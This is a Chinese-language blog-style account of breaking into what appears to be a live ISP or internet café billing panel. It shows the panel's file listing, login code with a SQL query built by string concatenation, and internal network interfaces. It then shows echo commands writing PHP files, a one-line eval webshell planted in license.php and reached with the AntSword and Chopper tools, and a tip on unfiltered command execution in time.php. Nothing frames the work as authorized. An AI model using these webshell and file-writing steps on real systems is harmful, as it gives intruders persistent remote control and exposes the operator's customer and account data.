-rwxr-xr-x 1 toor root 8715 Dec 6 2015 njtn_region.php
-rwxr-xr-x 1 toor root 4439 Dec 6 2015 njtnisp_add.php
-rwxr-xr-x 1 toor root 5558 Dec 6 2015 njtnisp_edit.php
-rwxr-xr-x 1 toor root 2797 Dec 6 2015 njtnisp_list.php
-rwxr-xr-x 1 toor root 1079 Dec 6 2015 online.php
-rwxr-xr-x 1 toor root 5452 Dec 6 2015 opagent.php
-rwxr-xr-x 1 toor root 53629 Dec 6 2015 open-flash-chart.swf
-rwxr-xr-x 1 toor root 4201 Dec 6 2015 operate_login_log.php
-rwxr-xr-x 1 toor root 8813 Dec 6 2015 operate_netplay_log.php
-rwxr-xr-x 1 toor root 9649 Dec 6 2015 operate_online.php
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 operate_userlog.php
-rwxr-xr-x 1 toor root 8204 Dec 6 2015 order.php
-rwxr-xr-x 1 toor root 40164 Dec 6 2015 order_add.php
-rwxr-xr-x 1 toor root 448 Dec 6 2015 order_del.php
-rwxr-xr-x 1 toor root 5311 Dec 6 2015 order_run.php
-rwxr-xr-x 1 toor root 4677 Dec 6 2015 order_ticket.php
-rwxr-xr-x 1 toor root 6456 Dec 6 2015 pause.php
-rwx------ 1 toor root 520 Dec 6 2015 pdo.php
drwxr-xr-x 2 toor root 80 Dec 6 2015 php-ofc-library
-rwxr-xr-x 1 toor root 19 May 20 19:59 phpinfo.php
drwxr-xr-x 3 toor root 120 Dec 6 2015 phpmailer
-rwxr-xr-x 1 toor root 7998 Dec 6 2015 product.php
-rwxr-xr-x 1 toor root 29764 Dec 6 2015 product_add.php
-rwxr-xr-x 1 toor root 584 Dec 6 2015 product_del.php
-rwxr-xr-x 1 toor root 27481 Dec 6 2015 product_edit.php
-rwxr-xr-x 1 toor root 5984 Dec 6 2015 project.php
-rwxr-xr-x 1 toor root 18772 Dec 6 2015 project_add.php
-rwxr-xr-x 1 toor root 731 Dec 6 2015 project_del.php
-rwxr-xr-x 1 toor root 22354 Dec 6 2015 project_edit.php
-rwxr-xr-x 1 toor root 7087 Dec 6 2015 project_ros.php
-rwxr-xr-x 1 toor root 5012 Dec 6 2015 receipt_list.php
-rwxr-xr-x 1 toor root 10531 Dec 6 2015 recharge_log.php
-rwxr-xr-x 1 toor root 5670 Dec 6 2015 recharge_reverse.php
-rwxr-xr-x 1 toor root 10604 Dec 6 2015 recharge_user.php
-rwxr-xr-x 1 toor root 5231 Dec 6 2015 rechargeagent.php
-rwxr-xr-x 1 toor root 7333 Dec 6 2015 repair.php
-rwxr-xr-x 1 toor root 3258 Dec 6 2015 repair_add.php
-rwxr-xr-x 1 toor root 345 Dec 6 2015 repair_del.php
-rwxr-xr-x 1 toor root 6547 Dec 6 2015 repair_disposal.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 repair_disposal_del.php
-rwxr-xr-x 1 toor root 6577 Dec 6 2015 repair_disposal_edit.php
-rwxr-xr-x 1 toor root 5476 Dec 6 2015 repair_disposal_log.php
-rwxr-xr-x 1 toor root 2596 Dec 6 2015 repair_edit.php
-rwxr-xr-x 1 toor root 3728 Dec 6 2015 repair_show_print.php
-rwxr-xr-x 1 toor root 11115 Dec 6 2015 ros_static_ip.php
-rwxr-xr-x 1 toor root 5901 Dec 6 2015 ros_write.php
-rwxr-xr-x 1 toor root 5205 Dec 6 2015 scan_dayparting.php
-rwxr-xr-x 1 toor root 1750 Dec 6 2015 scan_db_backup.php
-rwxr-xr-x 1 toor root 1586 Dec 6 2015 scan_down_line.php
-rwxr-xr-x 1 toor root 8360 Dec 6 2015 scan_everyone_hour.php
-rwxr-xr-x 1 toor root 8051 Dec 6 2015 scan_flow_limit.php
-rwxr-xr-x 1 toor root 1659 Dec 6 2015 scan_hour_flow.php
-rwxr-xr-x 1 toor root 1298 Dec 6 2015 scan_order_status.php
-rwxr-xr-x 1 toor root 4775 Dec 6 2015 scan_stop_restore.php
-rwxr-xr-x 1 toor root 43623 Dec 6 2015 scan_time_len.php
-rwxr-xr-x 1 toor root 509 Dec 6 2015 scan_timeout.php
-rwxr-xr-x 1 toor root 2109 Dec 6 2015 sendmail_backup.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 sendmailbackup
-rwxr-xr-x 1 toor root 5280 Dec 6 2015 sendsms.php
-rwxr-xr-x 1 toor root 2175 Dec 6 2015 short_messages.php
-rwxr-xr-x 1 toor root 2916 Dec 6 2015 speedrule.php
-rwxr-xr-x 1 toor root 3756 Dec 6 2015 speedrule_add.php
-rwxr-xr-x 1 toor root 229 Dec 6 2015 speedrule_del.php
-rwxr-xr-x 1 toor root 4681 Dec 6 2015 speedrule_edit.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 style
-rwxr-xr-x 1 toor root 2783 Dec 6 2015 system_config.php
-rwxr-xr-x 1 toor root 7461 Dec 6 2015 system_configuration.php
-rwxr-xr-x 1 toor root 2338 Dec 6 2015 system_database.php
-rwxr-xr-x 1 toor root 5054 Dec 6 2015 system_del_dial_log.php
-rwxr-xr-x 1 toor root 3370 Dec 6 2015 system_mac.php
-rwxr-xr-x 1 toor root 12563 Dec 6 2015 system_message_config.php
-rwxr-xr-x 1 toor root 3203 Dec 6 2015 system_message_d.php
-rwxr-xr-x 1 toor root 3603 Dec 6 2015 system_message_g.php
-rwxr-xr-x 1 toor root 3170 Dec 6 2015 system_message_j.php
-rwxr-xr-x 1 toor root 3664 Dec 6 2015 system_message_k.php
-rwxr-xr-x 1 toor root 3261 Dec 6 2015 system_message_v.php
-rwxr-xr-x 1 toor root 3643 Dec 6 2015 system_message_x.php
-rwxr-xr-x 1 toor root 5512 Dec 6 2015 system_publicnotice.php
-rwxr-xr-x 1 toor root 2733 Dec 6 2015 system_upgrade.php
-rwxr-xr-x 1 toor root 35505 May 22 00:00 t.php
drwxr-xr-x 2 toor root 40 Dec 6 2015 tb_backup
-rwxr-xr-x 1 toor root 1356 Dec 6 2015 test.php
-rwxr-xr-x 1 toor root 14960 Dec 6 2015 top.php
-rwxr-xr-x 1 toor root 4989 Dec 6 2015 truncate_alltable.php
-rwxrwxrwx 1 toor root 26 May 21 08:57 tui.php
-rwxrwxrwx 1 toor root 48 May 21 09:16 ty.php
-rwxrwxrwx 1 toor root 23 May 21 09:17 ty1.php
-rwxr-xr-x 1 toor root 20010 Dec 6 2015 user.php
-rwxr-xr-x 1 toor root 27496 Dec 6 2015 user_add.php
-rwxr-xr-x 1 toor root 5591 Dec 6 2015 user_assigned.php
-rwxr-xr-x 1 toor root 9119 Dec 6 2015 user_bill.php
-rwxr-xr-x 1 toor root 7273 Dec 6 2015 user_change_banwith.php
-rwxr-xr-x 1 toor root 7175 Dec 6 2015 user_closing.php
-rwxr-xr-x 1 toor root 13985 Dec 6 2015 user_closing_info.php
-rwxr-xr-x 1 toor root 3709 Dec 6 2015 user_del.php
-rwxr-xr-x 1 toor root 1926 Dec 6 2015 user_down_line.php
-rwxr-xr-x 1 toor root 31015 Dec 6 2015 user_edit.php
-rwxr-xr-x 1 toor root 8433 Dec 6 2015 user_flow_monitor.php
-rwxr-xr-x 1 toor root 9098 Dec 6 2015 user_hours_show.php
-rw-r--r-- 1 toor root 8 May 21 08:35 user_list.txt
-rwxr-xr-x 1 toor root 12429 Dec 6 2015 user_maturity.php
-rwxr-xr-x 1 toor root 6240 Dec 6 2015 user_move.php
-rwxr-xr-x 1 toor root 9520 Dec 6 2015 user_netbar.php
-rwxr-xr-x 1 toor root 13821 Dec 6 2015 user_normal_info.php
-rwxr-xr-x 1 toor root 12393 Dec 6 2015 user_pause.php
-rwxr-xr-x 1 toor root 5114 Dec 6 2015 user_pledgemoney.php
-rwxr-xr-x 1 toor root 13560 Dec 6 2015 user_replac_product.php
-rwxr-xr-x 1 toor root 2235 Dec 6 2015 user_rewrite.php
-rwxr-xr-x 1 toor root 26475 Dec 6 2015 user_show_print.php
-rwxr-xr-x 1 toor root 7698 Dec 6 2015 user_shutdown.php
-rwxr-xr-x 1 toor root 12953 Dec 6 2015 user_upcoming.php
-rwxr-xr-x 1 toor root 2168 May 20 20:07 userlog_table_attr.php
drwxr-xr-x 3 toor root 60 Dec 6 2015 usr
-rwxr-xr-x 1 toor root 3080 Dec 6 2015 vcodelogin.php

那就先找数据库配置吧，看看login_check.php

$ cat login_check.php
#!/bin/php
include("inc/conn.php");
date_default_timezone_set('Asia/Shanghai');
if($_POST)
{
$_POST=filtersql($_POST);
$manager_account=$_POST["username"];
$manager_passwd =md5($_POST["pwd"]);
$record =$db->select_one("*","manager","manager_account='".$manager_account."' and manager_passwd='".$manager_passwd."'");
if($record)
{
$_SESSION["managerID"] =$record["ID"];
$_SESSION["manager"] =$record["manager_account"];
$_SESSION["auth_permision"] =explode("#",$record["manager_permision"]);
$_SESSION["auth_project"] =empty($record["manager_project"])?"0":$record["manager_project"];
$_SESSION["auth_gradeID"] =empty($record["manager_gradeID"])?"0":$record["manager_gradeID"];
$_SESSION["addusernum"] =$record["addusernum"];
$_SESSION["addusertotalnum"] =$record["addusertotalnum"];
$_SESSION["managerlogintime"] =time();
$productID=empty($record["manager_product"])?"0":$record["manager_product"];
$product=$db->select_all('productID',"productandproject","projectID in (".$_SESSION["auth_project"].") and productID in (".$productID.")");
if(is_array($product))
{
foreach($product as $prs)
{
$pID.=$prs['productID'].",";
}
$pID = rtrim($pID,",");
$_SESSION["auth_product"]=empty($pID)?"0":$pID ;
}
else
{
$_SESSION["auth_product"]=0;
}
$sql=array(
"name"=>$_SESSION["manager"],
"logindatetime"=>date("Y-m-d H:i:s",time()),
"loginip"=>getClientIp(),
"content"=>$_SERVER['REQUEST_URI']
);
$db->insert_new("loginlog",$sql);
echo "ok";
}
else
{
echo "err";
}
}
?>

阿，原来它包含了个inc/conn.php文件，咱们看一下

哦~它数据库在本机啊，那就连一下，在vm中忙了一通，结果发现貌似连不上，失败了。
不对啊，应该有开端口吧，结果网上一查，6379没开，完了。没得玩了。
我用dnslog查回显，咦，怎么回事，和网址ip不一样啊，可能是内网主机，没直接连接到公网。
查看ifconfig -a

$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:90:27:FF:67:B2
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:fe6e0000-fe700000

eth1 Link encap:Ethernet HWaddr 00:90:27:FF:67:B3
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:fe7e0000-fe800000

eth2 Link encap:Ethernet HWaddr 00:90:27:FF:67:B4
inet addr:192.168.2.201 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::290:27ff:feff:67b4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:966110 errors:0 dropped:0 overruns:0 frame:0
TX packets:1100154 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:139520684 (133.0 MiB) TX bytes:403410471 (384.7 MiB)
Interrupt:18 Memory:fe8e0000-fe900000

eth3 Link encap:Ethernet HWaddr 00:90:27:FF:67:B5
inet addr:192.168.3.1 Bcast:192.168.3.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:19 Memory:fe9e0000-fea00000

eth4 Link encap:Ethernet HWaddr 00:90:27:FF:67:B6
inet addr:192.168.4.1 Bcast:192.168.4.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16 Memory:feae0000-feb00000

eth5 Link encap:Ethernet HWaddr 00:90:27:FF:67:B7
inet addr:192.168.5.1 Bcast:192.168.5.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:17 Memory:febe0000-fec00000

gre0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1476 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

gretap0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
BROADCAST MULTICAST MTU:1462 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ip_vti0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1364 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:6024897 errors:0 dropped:0 overruns:0 frame:0
TX packets:6024897 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1739123468 (1.6 GiB) TX bytes:1739123468 (1.6 GiB)

sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

teql0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
NOARP MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

tunl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-20-00-00-00-00-00-00-00-00-00
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

查看route -n

可见确实是内网主机，且它在192.168.2.x段，ping 192.168.2.200 是通的
那怎么办好呢？
要不写个马吧
先phpinfo();测试下
使用echo函数慢慢写入

echo '<?php '>999.php
echo 'phpinfo();'>>999.php

直接访问，嗯？权限不足？

嗯，确实是权限不足，我也不会提高他权限啊，怎么办呢？

在思考的过程中，随便看了下，发现了有个叫license.php的文件。这个权限高啊-rwxr-xr-x，尝试重写修改，好家伙，权限不变！咱们来看下

嗯，好玩了
都变的有趣了，上马！
就@eval($_GET[pass]);一句话吧

蚁剑！测试！

狗东西，上线了！
咱来看看有啥好东西！

怎么回事？html转义了？
啥傻逼玩意？怎么办啊？
目前太晚了，只好等明早问问大佬们了。。。

哦对了，既然能包含inc/conn.php，也能修改文件，那我能不能去问问它账号密码呢？有待思考！
最后用菜刀连接上了且不报错！

后记

根据peiqi师傅发现的time.php目录下有无过滤传参远程命令执行，只需要post请求传递参数即可命令执行。
写一句话时，要用单引号，$也需要\$转义。